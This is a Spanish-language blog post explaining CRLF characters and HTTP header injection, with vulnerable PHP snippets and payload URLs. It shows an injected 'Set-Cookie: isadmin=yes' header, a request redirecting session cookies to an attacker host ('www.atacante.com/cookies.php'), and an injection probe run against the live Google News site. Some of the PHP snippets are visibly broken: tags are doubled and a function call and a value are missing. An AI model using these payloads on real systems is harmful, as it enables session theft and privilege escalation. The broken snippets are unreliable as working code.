CRLF
Posted on 17:00 by Xianur0
CR: retorno de carro.
Carácter Hexadecimal: 0D.
Carácter Decimal: 13.
LF: Salto de Linea.
Carácter Hexadecimal: 0A.
Carácter Decimal: 10.
CRLF:
Combinación de códigos de control (CR y LF) por la cual se crea una nueva linea.
Explicación Técnica:
Esta combinacion de codigos de control pueden ser usados para crear una nueva linea en metodos computacionales.
Ejemplo:
Código:
<?php
<?php
('Location: '.$_GET['page']);
?>
Con ese codigo y la version PHP correcta podriamos crear un header adicional a base de este:
http://www.server.com/vulnerable.php?page=%0D%0ASet-Cookie: isadmin=yes
Con esto la respuesta HTTP seria algo como esto:
Código:
HTTP/1.1 302 Found
Location:
Set-Cookie: isadmin=yes
También podríamos usarlo para robar cookies:
Código:
<?php
<?php
include('sessid.php');
$domain = $_REQUEST['uri'];
$id=
header('Set-Cookie: domain='.$domain.'; SESSID='.$id);
?>
Código:
GET http://www.server.com/vulnerable.php?exploit=%0D%0ALocation: http://www.atacante.com/cookies.php?cookie= HTTP/1.1
Host: www.server.com
y la respuesta seria:
Código:
HTTP/1.1 302 Found
Set-Cookie: domain=
Location: http://www.atacante.com/cookies.php?cookie=SESSID=datos
bueno esos son solo ejemplos de esta clase de ataques, ahora vamos a los ejemplos y ataquemos a google news:
Código:
http://news.google.com.mx/news?xianur0%5B%0D%0AXianur0%15Was%10%10%15Here%15%43%4F%44%45%0D%0A%15%48%45%58%5D=%0D%0A
Y en el código fuente podremos encontrar:
Código:
<input type=hidden name="xianur0[
Xianur0 Was Here CODE
HEX]" value="
como verán hasta los %10 los interpreto .. aparentemente nada mas están filtradas las dobles comillas y los > y < (por el htmlentities que si valora el revisar caracteres hexadecimales).
Extencion de Contenido:
IMAP/SMTP Injection (Gracias a Inyexion por el link)
0 comentarios:
Publicar un comentario